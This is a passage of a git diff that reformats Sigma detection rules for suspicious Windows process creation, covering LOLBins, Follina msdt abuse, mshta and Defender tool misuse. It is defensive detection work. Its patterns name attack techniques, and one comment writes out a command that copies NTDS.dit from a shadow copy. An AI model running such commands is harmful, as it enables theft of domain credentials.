b/sigma/sysmon/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml @@ -1,11 +1,10 @@ title: Visual Basic Command Line Compiler Usage id: 7b10f171-7f04-47c7-9fa2-5be43c76e535 status: test -description: Detects successful code compilation via Visual Basic Command Line Compiler - that utilizes Windows Resource to Object Converter. +description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter. references: - https://lolbas-project.github.io/lolbas/Binaries/Vbc/ -author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative" +author: Ensar Şamil, @sblmsrsn, @oscd_initiative date: 2020/10/07 modified: 2021/11/27 tags: diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml index 741d81a2c..6a3207a16 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml @@ -1,8 +1,7 @@ title: Use of VisualUiaVerifyNative.exe id: b30a8bc5-e21b-4ca2-9420-0a94019ac56a status: test -description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass - and is listed in Microsoft's recommended block rules. +description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/ - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules @@ -22,8 +21,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \VisualUiaVerifyNative.exe - - OriginalFileName: VisualUiaVerifyNative.exe + - Image|endswith: \VisualUiaVerifyNative.exe + - OriginalFileName: VisualUiaVerifyNative.exe condition: process_creation and selection falsepositives: - Legitimate testing of Microsoft UI parts. diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml index 6a743815c..c31321565 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml @@ -1,8 +1,7 @@ title: Use of VSIISExeLauncher.exe id: 18749301-f1c5-4efc-a4c3-276ff1f5b6f8 status: test -description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can - be used to execute arbitrary binaries +description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \VSIISExeLauncher.exe - - OriginalFileName: VSIISExeLauncher.exe + - Image|endswith: \VSIISExeLauncher.exe + - OriginalFileName: VSIISExeLauncher.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -p ' - ' -a ' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_wfc.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_wfc.yml index 6baf577a3..3a46fa476 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_wfc.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_wfc.yml @@ -1,8 +1,7 @@ title: Use of Wfc.exe id: 49be8799-7b4d-4fda-ad23-cafbefdebbc5 status: test -description: The Workflow Command-line Compiler can be used for AWL bypass and is - listed in Microsoft's recommended block rules. +description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/ - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules @@ -20,8 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \wfc.exe - - OriginalFileName: wfc.exe + - Image|endswith: \wfc.exe + - OriginalFileName: wfc.exe condition: process_creation and selection falsepositives: - Legitimate use by a software developer diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_wlrmdr.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_wlrmdr.yml index a7995890f..51fea8a01 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_wlrmdr.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_wlrmdr.yml @@ -19,24 +19,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_child_img: - - Image|endswith: \wlrmdr.exe - - OriginalFileName: WLRMNDR.EXE + - Image|endswith: \wlrmdr.exe + - OriginalFileName: WLRMNDR.EXE selection_child_cli: - CommandLine|contains|all: + CommandLine|contains|all: + # Note that the dash "-" can be replaced with a slash "/" (TODO: Use the "windash" modifier when it's introduced) - '-s ' - '-f ' - '-t ' - '-m ' - '-a ' - '-u ' - selection_parent: + selection_parent: # This selection is looking for processes spawned from wlrmdr using the "-u" flag ParentImage|endswith: \wlrmdr.exe filter: ParentImage: C:\Windows\System32\winlogon.exe filter_null: ParentImage: '-' - condition: process_creation and (selection_parent or (all of selection_child_* - and not 1 of filter*)) + condition: process_creation and (selection_parent or (all of selection_child_* and not 1 of filter*)) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_workflow_compiler.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_workflow_compiler.yml index bb188182b..4dc38e99a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_workflow_compiler.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_workflow_compiler.yml @@ -1,8 +1,7 @@ title: Microsoft Workflow Compiler Execution id: 419dbf2b-8a9b-4bea-bf99-7544b050ec8d status: test -description: Detects invocation of Microsoft Workflow Compiler, which may permit the - execution of arbitrary unsigned code. +description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. references: - https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md @@ -24,8 +23,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \Microsoft.Workflow.Compiler.exe - - OriginalFileName: Microsoft.Workflow.Compiler.exe + - Image|endswith: \Microsoft.Workflow.Compiler.exe + - OriginalFileName: Microsoft.Workflow.Compiler.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolscript_register_app.yml b/sigma/sysmon/process_creation/proc_creation_win_lolscript_register_app.yml index 199b243e2..760a5d85e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolscript_register_app.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolscript_register_app.yml @@ -1,10 +1,7 @@ title: Potential Register_App.Vbs LOLScript Abuse id: 28c8f68b-098d-45af-8d43-8089f3e35403 status: test -description: Detects potential abuse of the "register_app.vbs" script that is part - of the Windows SDK. The script offers the capability to register new VSS/VDS Provider - as a COM+ application. Attackers can use this to install malicious DLLs for persistence - and execution. +description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution. references: - https://twitter.com/sblmsrsn/status/1456613494783160325?s=20 - https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs @@ -23,14 +20,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \cscript.exe - - \wscript.exe - - OriginalFileName: - - cscript.exe - - wscript.exe + - Image|endswith: + - \cscript.exe + - \wscript.exe + - OriginalFileName: + - cscript.exe + - wscript.exe selection_cli: - CommandLine|contains: '.vbs -register ' + CommandLine|contains: '.vbs -register ' # register_app.vbs condition: process_creation and (all of selection*) falsepositives: - Other VB scripts that leverage the same starting command line flags diff --git a/sigma/sysmon/process_creation/proc_creation_win_lsass_process_clone.yml b/sigma/sysmon/process_creation/proc_creation_win_lsass_process_clone.yml index 7d569e41a..2458ad7f4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lsass_process_clone.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lsass_process_clone.yml @@ -1,8 +1,7 @@ title: Potential Credential Dumping Via LSASS Process Clone id: c8da0dfd-4ed0-4b68-962d-13c9c884384e status: test -description: Detects a suspicious LSASS process process clone that could be a sign - of credential dumping activity +description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity references: - https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/ - https://twitter.com/Hexacorn/status/1420053502554951689 diff --git a/sigma/sysmon/process_creation/proc_creation_win_malware_conti_shadowcopy.yml b/sigma/sysmon/process_creation/proc_creation_win_malware_conti_shadowcopy.yml index 5b55f0ed7..f76099860 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_malware_conti_shadowcopy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_malware_conti_shadowcopy.yml @@ -1,8 +1,7 @@ title: Sensitive Registry Access via Volume Shadow Copy id: f57f8d16-1f39-4dcb-a604-6c73d9b54b3d status: test -description: Detects a command that accesses password storing registry hives via volume - shadow backups +description: Detects a command that accesses password storing registry hives via volume shadow backups references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection @@ -22,9 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy + # copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1 + # There is an additional "\" to escape the special "?" + CommandLine|contains: \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy selection_2: - CommandLine|contains: + CommandLine|contains: - \\NTDS.dit - \\SYSTEM - \\SECURITY diff --git a/sigma/sysmon/process_creation/proc_creation_win_malware_script_dropper.yml b/sigma/sysmon/process_creation/proc_creation_win_malware_script_dropper.yml index 3b6eb5ba3..1f32c732d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_malware_script_dropper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_malware_script_dropper.yml @@ -21,11 +21,11 @@ detection: Image|endswith: - \wscript.exe - \cscript.exe - CommandLine|contains: + CommandLine|contains: - C:\Users\ - C:\ProgramData\ selection2: - CommandLine|contains: + CommandLine|contains: - .jse - .vbe - .js diff --git a/sigma/sysmon/process_creation/proc_creation_win_mftrace_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_mftrace_child_process.yml index d99b274ae..e67726403 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mftrace_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mftrace_child_process.yml @@ -1,8 +1,7 @@ title: Potential Mftrace.EXE Abuse id: 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e status: experimental -description: Detects child processes of the "Trace log generation tool for Media Foundation - Tools" (Mftrace.exe) which can abused to execute arbitrary binaries. +description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml b/sigma/sysmon/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml index c71b10860..fb44c46ff 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml @@ -1,9 +1,7 @@ title: MMC20 Lateral Movement id: f1f3bf22-deb2-418d-8cce-e1a45e46a5bd status: test -description: Detects MMC20.Application Lateral Movement; specifically looks for the - spawning of the parent MMC.exe with a command line of "-Embedding" as a child - of svchost.exe +description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe references: - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing @@ -24,7 +22,7 @@ detection: selection: ParentImage|endswith: \svchost.exe Image|endswith: \mmc.exe - CommandLine|contains: -Embedding + CommandLine|contains: -Embedding condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_mmc_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_mmc_susp_child_process.yml index 359660564..7bb2b3f84 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mmc_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mmc_susp_child_process.yml @@ -21,17 +21,17 @@ detection: selection1: ParentImage|endswith: \mmc.exe selection2: - - Image|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - \wscript.exe - - \cscript.exe - - \sh.exe - - \bash.exe - - \reg.exe - - \regsvr32.exe - - Image|contains: \BITSADMIN + - Image|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + - \cscript.exe + - \sh.exe + - \bash.exe + - \reg.exe + - \regsvr32.exe + - Image|contains: \BITSADMIN condition: process_creation and (all of selection*) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_mofcomp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_mofcomp_execution.yml index bc854e172..869333205 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mofcomp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mofcomp_execution.yml @@ -1,15 +1,10 @@ title: Potential Suspicious Mofcomp Execution id: 1dd05363-104e-4b4a-b963-196a534b03a1 status: experimental -description: 'Detects execution of the "mofcomp" utility as a child of a suspicious - shell or script running utility or by having a suspicious path in the commandline. - - The "mofcomp" utility parses a file containing MOF statements and adds the classes - and class instances defined in the file to the WMI repository. - +description: | + Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. + The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts - - ' references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml @@ -29,32 +24,32 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mofcomp.exe - - OriginalFileName: mofcomp.exe + - Image|endswith: \mofcomp.exe + - OriginalFileName: mofcomp.exe selection_case: - - ParentImage|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - \wsl.exe - - \wscript.exe - - \cscript.exe - - CommandLine|contains: - - \AppData\Local\Temp - - \Users\Public\ - - \WINDOWS\Temp\ - - '%temp%' - - '%tmp%' - - '%appdata%' + - ParentImage|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - \wsl.exe + - \wscript.exe + - \cscript.exe + - CommandLine|contains: + - \AppData\Local\Temp + - \Users\Public\ + - \WINDOWS\Temp\ + - '%temp%' + - '%tmp%' + - '%appdata%' filter_main_wmiprvse: ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe - CommandLine|contains: C:\Windows\TEMP\ - CommandLine|endswith: .mof + CommandLine|contains: C:\Windows\TEMP\ + CommandLine|endswith: .mof filter_optional_null_parent: - CommandLine|contains: C:\Windows\TEMP\ - CommandLine|endswith: .mof - condition: process_creation and (all of selection_* and not 1 of filter_main_* - and not 1 of filter_optional_*) + # Sometimes the parent information isn't available from the Microsoft-Windows-Security-Auditing provider. + CommandLine|contains: C:\Windows\TEMP\ + CommandLine|endswith: .mof + condition: process_creation and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml b/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml index f802a4d13..a4a5c2679 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml @@ -1,11 +1,10 @@ title: Potential Mpclient.DLL Sideloading Via Defender Binaries id: 7002aa10-b8d4-47ae-b5ba-51ab07e228b9 related: - - id: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc - type: similar + - id: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc + type: similar status: experimental -description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes - ("MpCmdRun" and "NisSrv") from their non-default directory. +description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool author: Bhabesh Raj diff --git a/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml b/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml index 4ab54d9f9..5b49cafe5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml @@ -22,12 +22,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: MpCmdRun.exe - - Image|endswith: \MpCmdRun.exe - - CommandLine|contains: MpCmdRun.exe - - Description: Microsoft Malware Protection Command Line Utility + - OriginalFileName: MpCmdRun.exe + - Image|endswith: \MpCmdRun.exe + - CommandLine|contains: MpCmdRun.exe + - Description: Microsoft Malware Protection Command Line Utility selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - DownloadFile - url condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml b/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml index e29679485..d1db94675 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml @@ -1,8 +1,7 @@ title: Windows Defender Definition Files Removed id: 9719a8aa-401c-41af-8108-ced7ec9cd75c status: test -description: Adversaries may disable security tools to avoid possible detection of - their tools and activities by removing Windows Defender Definition Files +description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \MpCmdRun.exe - - OriginalFileName: MpCmdRun.exe + - Image|endswith: \MpCmdRun.exe + - OriginalFileName: MpCmdRun.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -RemoveDefinitions' - ' -All' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_msbuild_susp_parent_process.yml b/sigma/sysmon/process_creation/proc_creation_win_msbuild_susp_parent_process.yml index 999230891..c36a1ffe2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msbuild_susp_parent_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msbuild_susp_parent_process.yml @@ -18,8 +18,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \MSBuild.exe - - OriginalFileName: MSBuild.exe + - Image|endswith: \MSBuild.exe + - OriginalFileName: MSBuild.exe filter_parent: ParentImage|endswith: - \devenv.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml index 49ac992b7..c58aba71d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml @@ -1,8 +1,7 @@ title: Potential Arbitrary Command Execution Using Msdt.EXE id: 258fc8ce-8352-443a-9120-8a11e4857fa5 status: test -description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" - binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability +description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability references: - https://twitter.com/nao_sec/status/1530196847679401984 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ @@ -22,18 +21,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - Image|endswith: \msdt.exe + - OriginalFileName: msdt.exe selection_cmd_inline: - CommandLine|contains: IT_BrowseForFile= + CommandLine|contains: IT_BrowseForFile= selection_cmd_answerfile_flag: - CommandLine|contains: ' PCWDiagnostic' + CommandLine|contains: ' PCWDiagnostic' selection_cmd_answerfile_param: - CommandLine|contains: + CommandLine|contains: - ' /af ' - ' -af ' - condition: process_creation and (selection_img and (selection_cmd_inline or all - of selection_cmd_answerfile_*)) + condition: process_creation and (selection_img and (selection_cmd_inline or all of selection_cmd_answerfile_*)) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_cab_options.yml b/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_cab_options.yml index d5ff3c0b5..06c5705a8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_cab_options.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_cab_options.yml @@ -1,11 +1,10 @@ title: Suspicious Cabinet File Execution Via Msdt.EXE id: dc4576d4-7467-424f-9eee-fd2b02855fe0 related: - - id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3 - type: obsoletes + - id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3 + type: obsoletes status: test -description: Detects execution of msdt.exe using the "cab" flag which could indicates - suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 +description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 references: - https://twitter.com/nas_bench/status/1537896324837781506 - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab @@ -26,10 +25,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - Image|endswith: \msdt.exe + - OriginalFileName: msdt.exe selection_cmd: - CommandLine|contains: + CommandLine|contains: - ' /cab ' - ' -cab ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_parent.yml index d499b743c..5eb5e326c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_parent.yml @@ -1,8 +1,7 @@ title: Suspicious MSDT Parent Process id: 7a74da6b-ea76-47db-92cc-874ad90df734 status: test -description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 - / Follina exploitation +description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation references: - https://twitter.com/nao_sec/status/1530196847679401984 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ @@ -34,9 +33,10 @@ detection: - \wmic.exe - \wscript.exe - \wsl.exe + # Note: office applications are covered by: 438025f9-5856-4663-83f7-52f878a70a50 selection_msdt: - - Image|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - Image|endswith: \msdt.exe + - OriginalFileName: msdt.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_msedge_proxy_download.yml b/sigma/sysmon/process_creation/proc_creation_win_msedge_proxy_download.yml index 8927a3a5a..8a0da858c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msedge_proxy_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msedge_proxy_download.yml @@ -19,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msedge_proxy.exe - - OriginalFileName: msedge_proxy.exe + - Image|endswith: \msedge_proxy.exe + - OriginalFileName: msedge_proxy.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_http.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_http.yml index 51fd7a973..137ee15af 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_http.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mshta_http.yml @@ -1,9 +1,7 @@ title: Remotely Hosted HTA File Executed Via Mshta.EXE id: b98d0db6-511d-45de-ad02-e82a98729620 status: test -description: Detects execution of the "mshta" utility with an argument containing - the "http" keyword, which could indicate that an attacker is executing a remotely - hosted malicious hta file +description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file references: - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html author: Nasreddine Bencherchali (Nextron Systems) @@ -22,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mshta.exe - - OriginalFileName: MSHTA.EXE + - Image|endswith: \mshta.exe + - OriginalFileName: MSHTA.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// - ftp:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_inline_vbscript.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_inline_vbscript.yml index 34d174b47..d237a583b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_inline_vbscript.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mshta_inline_vbscript.yml @@ -1,8 +1,7 @@ title: Wscript Shell Run In CommandLine id: 2c28c248-7f50-417a-9186-a85b223010ee status: experimental -description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in - the command, which could indicate a suspicious activity +description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity references: - https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html - https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/ @@ -21,13 +20,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - Wscript. - .Shell - .Run condition: process_creation and selection falsepositives: - - Inline scripting can be used by some rare third party applications or administrators. - Investigate and apply additional filters accordingly + - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_javascript.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_javascript.yml index ef0b75f6b..792446307 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_javascript.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mshta_javascript.yml @@ -20,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mshta.exe - - OriginalFileName: MSHTA.EXE + - Image|endswith: \mshta.exe + - OriginalFileName: MSHTA.EXE selection_cli: - CommandLine|contains: javascript + CommandLine|contains: javascript condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_lethalhta_technique.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_lethalhta_technique.yml index 9327ba644..9697afda7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_lethalhta_technique.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mshta_lethalhta_technique.yml @@ -1,8 +1,7 @@ title: Potential LethalHTA Technique Execution id: ed5d72a6-f8f4-479d-ba79-02f6a80d7471 status: test -description: Detects potential LethalHTA technique where the "mshta.exe" is spawned - by an "svchost.exe" process +description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process references: - https://codewhitesec.blogspot.com/2018/07/lethalhta.html author: Markus Neis diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_child_processes.yml index f76dc12f8..692c5219f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_child_processes.yml +++ 